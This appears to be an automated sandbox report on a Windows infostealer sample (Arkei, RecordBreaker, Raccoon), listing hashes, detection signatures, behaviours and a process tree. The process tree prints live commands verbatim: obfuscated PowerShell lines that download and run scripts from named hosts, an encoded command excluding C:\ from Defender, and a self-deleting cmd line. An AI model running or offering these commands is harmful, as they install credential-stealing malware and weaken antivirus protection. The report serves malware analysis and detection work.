arkei | 502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7

Analysis

max time kernel
242s
max time network
240s
platform
windows7_x64
resource
win7-20220414-en
submitted
21-06-2022 03:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe
Size

65KB
MD5

53dec7a3a6418bbc55d20e40e97a224c
SHA1

b6427092966218261138ad15a911f4cca5d9a69b
SHA256

502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7
SHA512

3f350abd77595b6e31b91448e1fc3d3a24e331b1496f8d3d90d32e99f94ac2cd0d72b9533d20d9a17d8e5a903b7908a987bee884b8b0ebdecb51be72947bc16f

Score

10^/10

arkei recordbreaker default discovery spyware stealer suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://timekeeper.ug/ppx.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://boundertime.ru/pps.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://timebounder.ru/pps.ps1

Extracted

Family

recordbreaker

http://136.244.65.99/

http://140.82.52.55/

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei

Raccoon ver2 5 IoCs

Raccoon ver2.

Processes:

resource	yara_rule
behavioral1/memory/1224-171-0x0000000000400000-0x0000000000412000-memory.dmp	raccoon_v2
behavioral1/memory/900-173-0x0000000000400000-0x0000000000412000-memory.dmp	raccoon_v2
behavioral1/memory/1532-307-0x0000000000400000-0x0000000000412000-memory.dmp	raccoon_v2
behavioral1/memory/984-309-0x0000000000400000-0x0000000000412000-memory.dmp	raccoon_v2
behavioral1/memory/524-310-0x0000000000400000-0x0000000000412000-memory.dmp	raccoon_v2

RecordBreaker
RecordBreaker is an information stealer capable of downloading and executing secondary payloads written in C++.
stealer recordbreaker
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata
suricata: ET MALWARE Windows executable base64 encoded
suricata: ET MALWARE Windows executable base64 encoded
suricata
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

8 1288 powershell.exe
9 2020 powershell.exe
Downloads MZ/PE file

flow	pid	process
8	1288	powershell.exe
9	2020	powershell.exe

Executes dropped EXE 22 IoCs

Processes:

oxu.exeoxu.exeoxu.exeoxu.exebvdeasfsds.exebvcfsds.exebvdeasfsds.exevnbdfgfsds.exevnbdfgfsds.exexcvtreygfsds.exexcvtreygfsds.exefcvtee.exebvcfsds.exefcvtee.exebvdeasfsds.exefcvtee.exefcvtee.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exexcvtreygfsds.exevnbdfgfsds.exevnbdfgfsds.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exe

pid	process
472	oxu.exe
1168	oxu.exe
1964	oxu.exe
1188	oxu.exe
1772	bvdeasfsds.exe
1292	bvcfsds.exe
1192	bvdeasfsds.exe
1840	vnbdfgfsds.exe
2040	vnbdfgfsds.exe
780	xcvtreygfsds.exe
904	xcvtreygfsds.exe
280	fcvtee.exe
900	bvcfsds.exe
788	fcvtee.exe
1224	bvdeasfsds.exe
1084	fcvtee.exe
376	fcvtee.exe
1388	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
524	xcvtreygfsds.exe
1532	vnbdfgfsds.exe
984	vnbdfgfsds.exe
288	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcvtreygfsds.exevnbdfgfsds.exexcvtreygfsds.exevnbdfgfsds.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation	xcvtreygfsds.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation	vnbdfgfsds.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation	xcvtreygfsds.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation	vnbdfgfsds.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe

Loads dropped DLL 30 IoCs

Processes:

powershell.exepowershell.exeoxu.exeoxu.exebvcfsds.exebvdeasfsds.exefcvtee.exefcvtee.exexcvtreygfsds.exexcvtreygfsds.exevnbdfgfsds.exevnbdfgfsds.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exe

pid	process
2020	powershell.exe
2020	powershell.exe
1288	powershell.exe
1168	oxu.exe
1168	oxu.exe
1188	oxu.exe
1188	oxu.exe
1188	oxu.exe
1188	oxu.exe
1168	oxu.exe
1188	oxu.exe
1168	oxu.exe
1188	oxu.exe
1292	bvcfsds.exe
1292	bvcfsds.exe
1772	bvdeasfsds.exe
1292	bvcfsds.exe
1772	bvdeasfsds.exe
1084	fcvtee.exe
1084	fcvtee.exe
376	fcvtee.exe
376	fcvtee.exe
780	xcvtreygfsds.exe
780	xcvtreygfsds.exe
904	xcvtreygfsds.exe
2040	vnbdfgfsds.exe
1840	vnbdfgfsds.exe
1388	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
288	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
288	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 15 IoCs

Processes:

fcvtee.exefcvtee.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ZM790ZMO	fcvtee.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WT2DT2NG	fcvtee.exe
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\47GLNG4O	fcvtee.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\5F3EKF3E	fcvtee.exe
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\00HDTR9Z	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\00HDTR9Z	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ZM790ZMO	fcvtee.exe
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WT2DT2NG	fcvtee.exe
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\5F3EKF3E	fcvtee.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\47GLNG4O	fcvtee.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

oxu.exeoxu.exe

pid process

1168 oxu.exe
1168 oxu.exe
1188 oxu.exe
1188 oxu.exe

pid	process
1168	oxu.exe
1168	oxu.exe
1188	oxu.exe
1188	oxu.exe

Suspicious use of SetThreadContext 10 IoCs

Processes:

oxu.exeoxu.exebvcfsds.exebvdeasfsds.exefcvtee.exefcvtee.exexcvtreygfsds.exevnbdfgfsds.exevnbdfgfsds.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exe

description	pid	process	target process
PID 472 set thread context of 1168	472	oxu.exe	oxu.exe
PID 1964 set thread context of 1188	1964	oxu.exe	oxu.exe
PID 1292 set thread context of 900	1292	bvcfsds.exe	bvcfsds.exe
PID 1772 set thread context of 1224	1772	bvdeasfsds.exe	bvdeasfsds.exe
PID 280 set thread context of 1084	280	fcvtee.exe	fcvtee.exe
PID 788 set thread context of 376	788	fcvtee.exe	fcvtee.exe
PID 780 set thread context of 524	780	xcvtreygfsds.exe	xcvtreygfsds.exe
PID 1840 set thread context of 1532	1840	vnbdfgfsds.exe	vnbdfgfsds.exe
PID 2040 set thread context of 984	2040	vnbdfgfsds.exe	vnbdfgfsds.exe
PID 1388 set thread context of 288	1388	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

fcvtee.exefcvtee.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	fcvtee.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	fcvtee.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	fcvtee.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	fcvtee.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

784 timeout.exe
1560 timeout.exe
1604 timeout.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1892 NOTEPAD.EXE

pid	process
784	timeout.exe
1560	timeout.exe
1604	timeout.exe

pid	process
1892	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexcvtreygfsds.exexcvtreygfsds.exevnbdfgfsds.exevnbdfgfsds.exepowershell.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exe

pid	process
1288	powershell.exe
1268	powershell.exe
2020	powershell.exe
1420	powershell.exe
1700	powershell.exe
1372	powershell.exe
1200	powershell.exe
780	xcvtreygfsds.exe
780	xcvtreygfsds.exe
904	xcvtreygfsds.exe
904	xcvtreygfsds.exe
2040	vnbdfgfsds.exe
2040	vnbdfgfsds.exe
1840	vnbdfgfsds.exe
1840	vnbdfgfsds.exe
1548	powershell.exe
1388	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
1388	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

oxu.exeoxu.exebvcfsds.exebvdeasfsds.exefcvtee.exefcvtee.exe

pid process

472 oxu.exe
1964 oxu.exe
1292 bvcfsds.exe
1772 bvdeasfsds.exe
280 fcvtee.exe
788 fcvtee.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exexcvtreygfsds.exevnbdfgfsds.exexcvtreygfsds.exepowershell.exevnbdfgfsds.exepowershell.exepowershell.exepowershell.exeFvmidruhvvwkpvmfzdjkqkyhgrn.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	780	xcvtreygfsds.exe
Token: SeDebugPrivilege	1840	vnbdfgfsds.exe
Token: SeDebugPrivilege	904	xcvtreygfsds.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	2040	vnbdfgfsds.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	1388	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
Token: SeDebugPrivilege	1548	powershell.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

oxu.exeoxu.exeoxu.exeoxu.exebvdeasfsds.exebvcfsds.exebvdeasfsds.exefcvtee.exefcvtee.exe

pid process

472 oxu.exe
1168 oxu.exe
1964 oxu.exe
1188 oxu.exe
1772 bvdeasfsds.exe
1292 bvcfsds.exe
1192 bvdeasfsds.exe
280 fcvtee.exe
788 fcvtee.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.execmd.exepowershell.exeoxu.exepowershell.exeoxu.exeoxu.exeoxu.exe

description	pid	process	target process
PID 1988 wrote to memory of 900	1988	502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe	cmd.exe
PID 1988 wrote to memory of 900	1988	502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe	cmd.exe
PID 1988 wrote to memory of 900	1988	502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe	cmd.exe
PID 1988 wrote to memory of 900	1988	502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe	cmd.exe
PID 900 wrote to memory of 1288	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1288	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1288	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1288	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 2020	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 2020	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 2020	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 2020	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1268	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1268	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1268	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1268	900	cmd.exe	powershell.exe
PID 900 wrote to memory of 1892	900	cmd.exe	NOTEPAD.EXE
PID 900 wrote to memory of 1892	900	cmd.exe	NOTEPAD.EXE
PID 900 wrote to memory of 1892	900	cmd.exe	NOTEPAD.EXE
PID 900 wrote to memory of 1892	900	cmd.exe	NOTEPAD.EXE
PID 2020 wrote to memory of 472	2020	powershell.exe	oxu.exe
PID 2020 wrote to memory of 472	2020	powershell.exe	oxu.exe
PID 2020 wrote to memory of 472	2020	powershell.exe	oxu.exe
PID 2020 wrote to memory of 472	2020	powershell.exe	oxu.exe
PID 472 wrote to memory of 1168	472	oxu.exe	oxu.exe
PID 472 wrote to memory of 1168	472	oxu.exe	oxu.exe
PID 472 wrote to memory of 1168	472	oxu.exe	oxu.exe
PID 472 wrote to memory of 1168	472	oxu.exe	oxu.exe
PID 472 wrote to memory of 1168	472	oxu.exe	oxu.exe
PID 1288 wrote to memory of 1964	1288	powershell.exe	oxu.exe
PID 1288 wrote to memory of 1964	1288	powershell.exe	oxu.exe
PID 1288 wrote to memory of 1964	1288	powershell.exe	oxu.exe
PID 1288 wrote to memory of 1964	1288	powershell.exe	oxu.exe
PID 1964 wrote to memory of 1188	1964	oxu.exe	oxu.exe
PID 1964 wrote to memory of 1188	1964	oxu.exe	oxu.exe
PID 1964 wrote to memory of 1188	1964	oxu.exe	oxu.exe
PID 1964 wrote to memory of 1188	1964	oxu.exe	oxu.exe
PID 1964 wrote to memory of 1188	1964	oxu.exe	oxu.exe
PID 1168 wrote to memory of 1772	1168	oxu.exe	bvdeasfsds.exe
PID 1168 wrote to memory of 1772	1168	oxu.exe	bvdeasfsds.exe
PID 1168 wrote to memory of 1772	1168	oxu.exe	bvdeasfsds.exe
PID 1168 wrote to memory of 1772	1168	oxu.exe	bvdeasfsds.exe
PID 1188 wrote to memory of 1292	1188	oxu.exe	bvcfsds.exe
PID 1188 wrote to memory of 1292	1188	oxu.exe	bvcfsds.exe
PID 1188 wrote to memory of 1292	1188	oxu.exe	bvcfsds.exe
PID 1188 wrote to memory of 1292	1188	oxu.exe	bvcfsds.exe
PID 1188 wrote to memory of 1192	1188	oxu.exe	bvdeasfsds.exe
PID 1188 wrote to memory of 1192	1188	oxu.exe	bvdeasfsds.exe
PID 1188 wrote to memory of 1192	1188	oxu.exe	bvdeasfsds.exe
PID 1188 wrote to memory of 1192	1188	oxu.exe	bvdeasfsds.exe
PID 1168 wrote to memory of 1840	1168	oxu.exe	vnbdfgfsds.exe
PID 1168 wrote to memory of 1840	1168	oxu.exe	vnbdfgfsds.exe
PID 1168 wrote to memory of 1840	1168	oxu.exe	vnbdfgfsds.exe
PID 1168 wrote to memory of 1840	1168	oxu.exe	vnbdfgfsds.exe
PID 1188 wrote to memory of 2040	1188	oxu.exe	vnbdfgfsds.exe
PID 1188 wrote to memory of 2040	1188	oxu.exe	vnbdfgfsds.exe
PID 1188 wrote to memory of 2040	1188	oxu.exe	vnbdfgfsds.exe
PID 1188 wrote to memory of 2040	1188	oxu.exe	vnbdfgfsds.exe
PID 1188 wrote to memory of 904	1188	oxu.exe	xcvtreygfsds.exe
PID 1188 wrote to memory of 904	1188	oxu.exe	xcvtreygfsds.exe
PID 1188 wrote to memory of 904	1188	oxu.exe	xcvtreygfsds.exe
PID 1188 wrote to memory of 904	1188	oxu.exe	xcvtreygfsds.exe
PID 1168 wrote to memory of 780	1168	oxu.exe	xcvtreygfsds.exe
PID 1168 wrote to memory of 780	1168	oxu.exe	xcvtreygfsds.exe

C:\Users\Admin\AppData\Local\Temp\502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe
"C:\Users\Admin\AppData\Local\Temp\502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\9B2.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://timekeeper.ug/ppx.ps1');s $nq
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1288

C:\Users\Public\oxu.exe
"C:\Users\Public\oxu.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1964

C:\Users\Public\oxu.exe
"C:\Users\Public\oxu.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1188

C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1292

C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"
7⤵
- Executes dropped EXE
PID:900

C:\Users\Admin\AppData\Roaming\fcvtee.exe
"C:\Users\Admin\AppData\Roaming\fcvtee.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:280

C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe" 0
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1192

C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
"C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe" 0
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
7⤵
- Executes dropped EXE
PID:984

C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe
"C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe" 0
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe
C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe
7⤵
PID:2012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://boundertime.ru/pps.ps1');s $nq
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020

C:\Users\Public\oxu.exe
"C:\Users\Public\oxu.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:472

C:\Users\Public\oxu.exe
"C:\Users\Public\oxu.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1168

C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe" 0
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1772

C:\Users\Admin\AppData\Roaming\fcvtee.exe
"C:\Users\Admin\AppData\Roaming\fcvtee.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:788

C:\Users\Admin\AppData\Roaming\fcvtee.exe
"C:\Users\Admin\AppData\Roaming\fcvtee.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
PID:376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Roaming\fcvtee.exe" & exit
9⤵
PID:1808

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
10⤵
- Delays execution with timeout.exe
PID:784

C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe"
7⤵
- Executes dropped EXE
PID:1224

C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
"C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe" 0
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
7⤵
- Executes dropped EXE
PID:1532

C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe
"C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe" 0
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Users\Admin\AppData\Local\Temp\Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
"C:\Users\Admin\AppData\Local\Temp\Fvmidruhvvwkpvmfzdjkqkyhgrn.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Users\Admin\AppData\Local\Temp\Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
